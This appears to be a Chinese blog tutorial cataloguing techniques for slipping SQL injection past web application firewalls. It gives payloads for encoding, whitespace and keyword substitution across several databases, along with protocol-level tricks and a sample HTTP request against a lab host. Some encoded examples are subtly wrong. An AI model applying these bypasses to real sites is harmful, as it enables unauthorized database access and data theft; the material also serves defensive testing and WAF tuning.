WAF-Bypass之SQL注入绕过思路总结
sinye56 2024-10-04 23:35 5 浏览 0 评论
过WAF(针对云WAF)
寻找真实IP(源站)绕过
如果流量都没有经过WAF,WAF当然无法拦截攻击请求。当前多数云WAF架构,例如百度云加速、阿里云盾等,通过更改DNS解析,把流量引入WAF集群,流量经过检测后转发请求到源站。如图,dict.com接入接入WAF后,dict.com的DNS解析结果指向WAF集群,用户的请求将发送给WAF集群,WAF集群经过检测认为非攻击请求再转发给源站。
image-20211101163158685
绕过云WAF寻找真实IP与绕过CDN寻找真实IP的方法类似,可以查看这篇文章:
https://plumeria.ltd/post/efd52af7.html#CDN%E7%9A%84%E7%BB%95%E8%BF%87
利用同网段绕过
一些在云服务商的站点,同时使用云服务商提供的WAF服务。当流量不是通过DNS解析引流到WAF,流量必须经过WAF的检测,这是不能通过发行源站进行绕过。可以考虑在云服务商买一台VPS,通过VPS攻击目标站点,因为流量是局域网,可能不经过WAF检测,实现绕过。能不能成功,关键在于云服务商的网络配置。
利用边界漏洞绕过
如果未能发现源站IP,可以尝试寻找子站的SSRF漏洞。如果子站访问目标站不经过WAF集群,可以利用SSRF漏洞来绕过WAF。
资源限制角度绕过WAF
超大数据包绕过
这是众所周知、而又难以解决的问题。如果HTTP请求POST BODY太大,检测所有的内容,WAF集群消耗太大的CPU、内存资源。因此许多WAF只检测前面的几K字节、1M、或2M。对于攻击者而然,只需要在POST BODY前面添加许多无用数据,把攻击payload放在最后即可绕过WAF检测。
协议层面绕过WAF
即使流量都确保经过WAF,如果WAF的防御策略根本就没有检测payload,那么也就能绕过WAF。协议层面绕过WAF,利用WAF解析协议的问题,使得payload被认为不是请求的HTTP请求的内容。
协议未覆盖绕过
在 http 头里的 Content-Type 提交表单支持四种协议:
?application/x-www-form-urlencoded -编码模式?multipart/form-data -文件上传模式?text/plain -文本模式?application/json -json模式
文件头的属性是传输前对提交的数据进行编码发送到服务器。其中 multipart/form-data 表示该数据被编码为一条消息,页上的每个控件对应消息中的一个部分。所以,当 waf 没有规则匹配该协议传输的数据时可被绕过。
pipeline绕过
http协议是由tcp协议封装而来,当浏览器发起一个http请求时,浏览器先和服务器建立起连接tcp连接,然后发送http数据包(即我们用burpsuite截获的数据),其中包含了一个Connection字段,一般值为close,apache等容器根据这个字段决定是保持该tcp连接或是断开。当发送的内容太大,超过一个http包容量,需要分多次发送时,值会变成keep-alive,即本次发起的http请求所建立的tcp连接不断开,直到所发送内容结束Connection为close为止。
img
发送两个请求,但绕过失败,被云锁拦截,此种方法现在基本失效。
img
分块传输绕过
分块传输编码(Chunked transfer encoding)是只在HTTP协议1.1版本(HTTP/1.1)中提供的一种数据传送机制。以往HTTP的应答中数据是整个一起发送的,并在应答头里Content-Length字段标识了数据的长度,以便客户端知道应答消息的结束。
分块编码具体方法
在头部加入Transfer-Encoding:chunked之后,就代表这个报文采用了分块编码。这时,报文中的实体需要改为用一系列分块来传输。
每个分块包含十六进制的长度值和数据,长度值独占一行,长度不包括它结尾的CRLF(\r\n),也不包括分块数据结尾的CRLF。
最后一个分块长度值必须为0,对应的分块数据没有内容,表示实体结束。
例:
Content-Type: text/plain
Transfer-Encoding: chunked
23\r\n
This is the data in the first chunk\r\n
1A\r\n
and this is the second one\r\n
3\r\n
con\r\n
8\r\n
sequence\r\n
0\r\n
\r\n
也可以使用github上的插件实现分块传输
chunked-coding-converter:https://github.com/c0ny1/chunked-coding-converter
img
另类字符集编码绕过
Content-Type头中使用charset定义字符集的应用场景不只有在responses中,request中同样可以使用。
常见的服务器与可见编码如下所示:
服务器信息可用编码说明Nginx, uWSGI-Django-Python3IBM037, IBM500, cp875, IBM1026, IBM273对参数名和参数值进行编码,服务器会对参数名和参数值均进行url解码,需要对等号和& and进行编码(不进行url编码)Nginx, uWSGI-Django-Python2IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424对参数名和参数值进行便慢慢 服务器会对参数名和参数值均进行url解码 等号和&符号不应该以任何方式编码。Apache-TOMCAT8-JVM1.8-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025参数名按原始格式(可以像往常一样使用url编码)Body不论是否经过url编码均可等号和&符号不应该以任何方式编码Apache-TOMCAT7-JVM1.6-JSPIBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025参数名按原始格式(可以像往常一样使用url编码) Body 不论是否经过url编码均可 等号和&符号不应该以任何方式编码IIS6, 7.5, 8, 10 -ASPX (v4.x)IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025参数名按原始格式(可以像往常一样使用url编码) Body 不论是否经过url编码均可 等号和&符号不应该以任何方式编码
规则缺陷/特性角度绕过WAF
空白符替换绕过
MySQL特性
select id,contents,time from news where news_id=1①union②select③1,2,username④from⑤admin
?位置①?可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0?可以利用注释符号替换空格:/**/、%23est%0d%0a、 --+a%0d%0a?可以利用数学运算以及数据类型:news_id=1.0,news_id=1E0,news_id=\N?位置②?可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0?可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a?可以利用括号:union(select 1,2)?位置③?可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0?可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a?可以利用其它符号:+ 、- 、 ~ 、!、@?位置④?可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0?可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a?大括号{}:union select {``1},{x 2}?可利用数学运算以及数据类型:
union select usename,2.0from admin union select username,8e0from admin union select username,\Nfrom admin
?位置⑤?可以利用其它控制字符替换空格:%09,%0a,%0b,%0c,%0d,%20,%a0?可以利用注释符号替换空格:/**/、%23test%0d%0a、 --+a%0d%0a?反引号`:union select 1,table_name,3 from`information_schema`.`tables`limit 0,1%23?内联注释:union select 1,table_name,3 from /*!50001information_schema.tables*/ limit 0,1%23?大括号{}:union select 1,table_name,3 from{x information_schema.tables}limit 0,1%23?小括号():union select 1,table_name,3 from(information_schema.tables)limit 0,1%23
SQLServer特性
select id,contents,time from news where news_id=1①union②select③1,2,db_name()④from⑤admin
- 位置①
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、--+a%0d%0a
- 可利用数学运算符以及数据类型:news_id=1.0,news_id=1e0,news_id=1-1
- 位置②
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、--+a%0d%0a
- 可以利用加号+替换空格:union+select
- 位置③
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、--+a%0d%0a
- 可利用数学运算符:+、-、~、. (注:其中-、~、.号必须是select查询的第一个字段的数据类型为数字型才能使用)
- 可以利用小括号()替换空格:select(1),2,db_name()
- 位置④
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、--+a%0d%0a
- 可利用其他字符:%80~%FF(需要IIS服务器支持)
- 位置⑤
- 可以利用其它控制字符替换空格:%01~%0F、%11~%1F
- 可以利用注释符号:/**/、--+a%0d%0a
- 可利用其他字符:%80~%FF(需要IIS服务器支持)
- 可以利用点号.替换空格:from.users
- 可以利用中括号[]替换空格:from[users]
Access特性
select id,contents,time from news where news_id=1①union②select③1,2,username④from⑤admin
?位置①?可利用其他控制字符替换空格:%09、%0a、%0c、%0d、%16?位置②?可利用其他控制字符替换空格:%09、%0a、%0c、%0d?位置③?可利用其他控制字符替换空格:%09、%0a、%0c、%0d?可使用其他字符:+、-、.、=
Oracle特性
select id,contents,time from news where news_id=1①union②select③1,2,username④from⑤admin
?位置①?可利用其他控制字符替换空格:%00、%09、%0a、%0b、%0c、%0d?可以利用其它控制字符替换空格:%1f、%1d?可使用其他字符:.?位置②?可利用其他控制字符替换空格:%00、%09、%0a、%0b、%0c、%0d?位置③?可利用其他控制字符替换空格:%00、%09、%0a、%0b、%0c、%0d?可使用其他字符:-、+、%ad?位置④?可利用其他控制字符替换空格:%09、%0a、%0c、%0d?位置⑤?可利用其他控制字符替换空格:%09、%0a、%0c、%0d?可插入字符:%30%ff、%24、%7b%22%7b%76
PostgreSQL特性
select id,contents,time from news where news_id=1①union②select③1,2,username④from⑤admin
?位置①?可利用其他控制字符替换空格:%09、%0a、%0c、%0d?可使用其他字符:.、!?位置②?可利用其他控制字符替换空格:%09、%0a、%0c、%0d?位置③?可利用其他控制字符替换空格:%09、%0a、%0c、 %0d?可使用其他字符:.、~、@、-、+?位置④?可利用其他控制字符替换空格:%09、%0a、%0c、%0d?位置⑤?可利用其他控制字符替换空格:%09、%0a、%0c、%0d?可插入字符:%30~%ff、%24
函数分隔符绕过
对基于正则表达式的WAF,我们猜测安全工程师写WAF规则时,可能不知道函数名与左括号之间可以存在特殊字符,或者遗漏可以存在特殊字符。例如匹配函数”concat()”的规则写法,“concat(”或者”concat\s*(”,就没有考虑到一些特殊字符。相应的绕过方法,在特殊位置引入特殊的分隔符,逐个测试。这些特殊分隔符发现也是通过Fuzz出来的。
等价关键字绕过
有些函数或命令因其关键字被检测出来而无法使用但是在很多情况下可以使用与之等价或类似的代码替代其使用。
以下举例了mysql中的等价关键字:
hex()、bin() ==> ascii()
sleep() ==>benchmark()
concat_ws()==>group_concat()
mid()、substr() ==> substring()
updatexml、extractvalue() ==> polygon()
@@user ==> user()
@@datadir ==> datadir()
and ==> &&
or ==> ||
not ==> !
xor ==> |
= ==> like
!= ==> <>
limit 0,1 ==> limit 1 offset 0
union select ==> union select * from (select 1)a join (select 2)b
’‘ ==> ""
'admin' ==> 0x61646D696E
select * from users where id = 1 order 4 ==> select * from users where id = 1 into @a,@b,@c,@d
添加库名绕过
以下两条查询语句,执行的结果是一致的,但是有些 waf 的拦截规则 并不会拦 截[库名].[表名]这种模式。
ALL 或者 DISTINCT 绕过
去掉重复值
select 1,2 from users where user_id=1 union DISTINCT select 1,2
select 1,2 from users where user_id=1 union select DISTINCT 1,2
显示全部
select 1,2 from users where user_id=1 union all
select 1,2 select 1,2 from users where user_id=1 union select all 1,
大小写绕过
常用于 waf的正则对大小写不敏感的情况,一般都是题目自己故意这样设计。
select * from users where id=1 UNION SELECT 1,2,3,4;
select * from users where id=1 UniON SelECT 1,2,3,4
双关键字绕过
在某一些简单的waf中,将关键字select等只使用replace()函数置换为空,这时候可以使用双写关键字绕过。例如select变成seleselectct,在经过waf的处理之后又变成select,达到绕过的要求。
双重/多重URL编码绕过
双重url编码,即对于浏览器发送的数据进行了两次urlencode操作,如s做一次url编码是%73,再进行一次编码是%25%37%33。一般情况下数据经过WAF设备的时候只会做一次url解码,这样解码之后的数据一般不会匹配到规则,达到了bypass的效果。
Unicode编码绕过
IIS服务器支持对于unicode的解析,例如我们对于select中的字符进行unicode编码,可以得到如下的s%u006c%u0006ect,这种字符在IIS接收到之后会被转换为select,但是对于WAF层,可能接收到的内容还是s%u006c%u0006ect,这样就会形成bypass的可能。
字符Unicode编码a%u0000 %u0041 %u0061 %u00aa %u00e2单引号%u0027 %u02b9 %u02bc %u02c8 %u2032 %uff07 %c0%27 %c0%a7 %e0%80%a7空白%u0020 %uff00 %c0%20 %c0%a0 %e0%80%a0左括号(%u0028 %uff08 %c0%28 %c0%a8 %e0%80%a8右括号)%u0029 %uff09 %c0%29 %c0%a9 %e0%80%a9
Emoji表情字符绕过
emoji是一串unicode字集组成,一个emoji图标可以占2、4、7个字节。且mysql支持emoji存储。
部分Emoji可以插入到%23与%0A之间实现绕过。
json提交与xml提交绕过
有些程序是 json 提交参数,程序也是 json 接收再拼接到 SQL 执行 json 格式通 常不会被拦截。所以可以绕过 waf。
POST /06/vul/sqli/sqli_id.php HTTP/1.1
Host: 192.168.0.115
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type:application/json
Content-Length: 38
Origin: http://192.168.0.115
Connection: close
Referer: http://192.168.0.115/06/vul/sqli/sqli_id.php
Cookie: PHPSESSID=e6sa76lft65q3fd25bilbc49v3; security_level=0
Upgrade-Insecure-Requests: 1
{'id':1 union select 1,2,3,'submit':1}
image-20211101231132608
同样 text/xml 也不会被拦截
特殊的百分号
在ASP/ASPX+IIS的环境中存在一个特性,就是特殊符号%,在该环境下当们我输入s%elect的时候,在WAF层可能解析出来的结果就是s%elect,但是在iis+asp的环境的时候,解析出来的结果为select。
HTTP参数污染
HPP是HTTP Parameter Pollution的缩写,意为HTTP参数污染。
在ASPX中,有一个比较特殊的HPP特性,当GET/POST/COOKIE同时提交的参数id,服务端接收参数id的顺序GET,POST,COOKIE,中间通过逗号链接,于是就有了这个idea。
UNION、SELECT、FROM 三个关键字分别放在GET/POST/COOKIE的位置,通过ASPX的这个特性连起来,堪称完美的一个姿势,压根不好防。
但姿势利用太过于局限:使用Request.Params["id"]来获取参数,G-P-C获取到参数拼接起来,仅仅作为Bypass分享一种思路而已。
下表中列举了一些主流环境下的HPP情况:
image-20211101212812215
GET方法传输POST数据绕过
大家的常识是GET参数通过URL传递,POST放在Request body中。
但是在某些中间件(如IIS)中的GET请求同样可以传输POST数据。
畸形method绕过
某些WAF在处理数据的时候严格按照GET、POST等标准HTTP方法来获取数据,或者采用正则匹配的方式来处理数据,可能因为WAF和WEB服务解析的前后不对等绕过WAF。
存在环境:Apache 2.X
某些apache版本在做GET请求的时候,无论method为何值均会取出GET的内容。
image-20211101212939505
畸形的boundary绕过
PHP在解析multipart data的时候有自己的特性,对于boundary的识别,只取了逗号前面的内容,例如我们设置的boundary为----aaaa,123456,php解析的时候只识别了----aaaa,后面的内容均没有识别。然而WAF在做解析的时候,有可能获取的是整个字符串,此时可能就会出现绕过。
存在环境:PHP
参数数量限制绕过
WAF在实际环境中为防止拒绝服务式攻击 (denial of service attacks),默认最多解析前 100 个请求参数 (包括同名的),更多的参数将直接忽略。
存在环境:Nginx+Lua WAF
image-20211101215241527
变换请求方式绕过
假如php里使用$_REQUEST获取参数,那么php获取参数的默认优先级是:
$_COOKIE > $_POST > $_GET。此时WAF层只过滤get/post,但没有过滤cookie,于是导致了绕过。
存在环境:PHP
信任白名单绕过
有些 WAF 会自带一些文件白名单,对于白名单 waf 不会拦截任何操作,所以可 以利用这个特点,可以试试白名单绕过。
白名单通常有目录:
/admin
/phpmyadmin
/admin.php
image-20211101220538726
静态文件绕过
除了白名单信任文件和目录外,还有一部分 waf 并不会对静态文件进行拦截。例如 图片文件 jpg 、png 、gif 或者 css 、js 会对这些静态文件的操作不会 进行检测从而绕过 waf 拦截。
/1.jpg&name=vince+&submit=1
/1.jpg=/1.jpg&name=vince+&submit=1
/1.css=/1.css&name=vince+&submit=1
image-20211101230701225
PostgreSQL字符串特性绕过
由于 postgres 会将双引号中的内容认为是一个表名/字段名,同时在双引号引起的字符串中使用 U& 前缀转义是合法的,所以当过滤了 information_schema 等关键名称时,可以将其用双引号引用并在其前面 加入 U&转义前缀,同时将其中某个字符替换为对应的 Unicode 表现形式来绕过 WAF。
例如:以下语句同样会返回所有的 Schema
select U&"tabl\0065_sch\0065ma" from U&"inform\0061tion_sch\0065ma".U&"t\0061bles" where
U&"tabl\0065_sch\0065ma" not in (U&'pg_cat\0061log',U&'inform\0061tion_sch\0065ma') group by 1;
相关推荐
- linux安装FTP
-
1、在nkftp目录下安装ftp,进入到nkftp里面[root@localhostbin]#cd/data/nkftp执行安装命令:[root@localhostnkftp]#rpm-i...
- LINUX下搭建FTP服务器
-
FTP服务器介绍FTP是FileTransferProtocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(App...
- Linux下如何进行FTP设置
-
目录:一、Redhat/CentOS安装vsftp软件二、Ubuntu/Debian安装vsftp软件一、Redhat/CentOS安装vsftp软件1.更新yum源yumupdate-y2.安...
- 推荐使用集串口 SSH远程登录和FTP传输三合一工具MobaXterm
-
来源:百问网作者:韦东山本文字数:1216,阅读时长:4分钟在以前的资料里,串口和SSH远程登使用SecureCRT,window与ubuntu数据传输使用filezilla,窗口切换来切换去,麻烦也...
- 如何搭建FTP服务器(Linux系统)
-
上次说了Windows操作系统下搭建的FTP服务器,那有朋友问我,说买的XX轻量应用服务器都是属于Linux的操作系统,我该如何为搭建FTP服务器呢?...
- Linux 命令 ncftp(文件传输)——想玩转linux就请一直看下去
-
我是IT悟道,点击右上方“关注”,每天分享IT、科技、数码方面的干货。Linuxncftp命令...
- 如何用 ftp 实现一键上传
-
简介ftp是Internet标准文件传输协议的用户界面,它允许用户与远程网络站点之间传输文件...
- Linux安装ftp
-
1安装vsftpd组件安装完后,有/etc/vsftpd/vsftpd.conf文件,是vsftp的配置文件。[root@bogon~]#yum-yinstallvsftpd2添加一个...
- 一天一点点:linux - ftp命令
-
linuxftp命令设置文件系统相关功能。FTP是ARPANet的标准文件传输协议,该网络就是现今Internet的前身。语法ftp[-dignv][主机名称或IP地址]参数:-d详细显示指令执...
- Centos 7 搭建FTP
-
目录安装软件以及启动服务添加防火墙规则关闭selinuxftp配置常用常用参数详解特殊参数配置文件没有的参数也可以添加到配置中1.安装软件以及启动服务yuminstall-yvsftpdsys...
- 【Linux】Linux中ftp命令,没有你想的那么简单
-
本文介绍了Linux中FTP命令的基本用法,包括连接与登录远程服务器,以及解析了FTP协议中五个最常用的操作命令的使用和解析过程。同时,提供了一个包含常用FTP操作命令的表格,供读者参考。通过熟练掌握...
- linux 命令行操作ftp
-
以下是linuxftp命令参数的详解。FTP>!从ftp子系统退出到外壳?FTP>?显示ftp命令说明??和help相同?格式:?[command]说明:[com...
- 多学习才能多赚钱之:linux如何使用ftp
-
linux如何使用ftp步骤1:建立FTP连接想要连接FTP服务器,在命令上中先输入ftp然后空格跟上FTP服务器的域名'domain.com'或者IP地址例如:ftpdom...
- linux常用网络操作方法:ftp命令使用方法
-
常用网络操作方法Linux提供了一组强有力的网络命令来为用户服务,这些工具能够帮助用户登录到远程计算机上、传输文件和执行远程命令等。本节介绍下列几个常用的有关网络操作的命令:ftp传输文件tel...
- Linux 5.15有望合并Memory Folios方案 内核构建速度可提升7%
-
甲骨文公司的长期内核开发人员MatthewWilcox已经研究了“内存对开区”概念相当长的一段时间,这可以改善Linux的内存管理,使其具有更大的效率。例如,使用内存对开的基准测试表明,内核的构建速...
你 发表评论:
欢迎- 一周热门
- 最近发表
- 标签列表
-
- oracle忘记用户名密码 (59)
- oracle11gr2安装教程 (55)
- mybatis调用oracle存储过程 (67)
- oracle spool的用法 (57)
- oracle asm 磁盘管理 (67)
- 前端 设计模式 (64)
- 前端面试vue (56)
- linux格式化 (55)
- linux图形界面 (62)
- linux文件压缩 (75)
- Linux设置权限 (53)
- linux服务器配置 (62)
- mysql安装linux (71)
- linux启动命令 (59)
- 查看linux磁盘 (72)
- linux用户组 (74)
- linux多线程 (70)
- linux设备驱动 (53)
- linux自启动 (59)
- linux网络命令 (55)
- linux传文件 (60)
- linux打包文件 (58)
- linux查看数据库 (61)
- linux获取ip (64)
- linux进程通信 (63)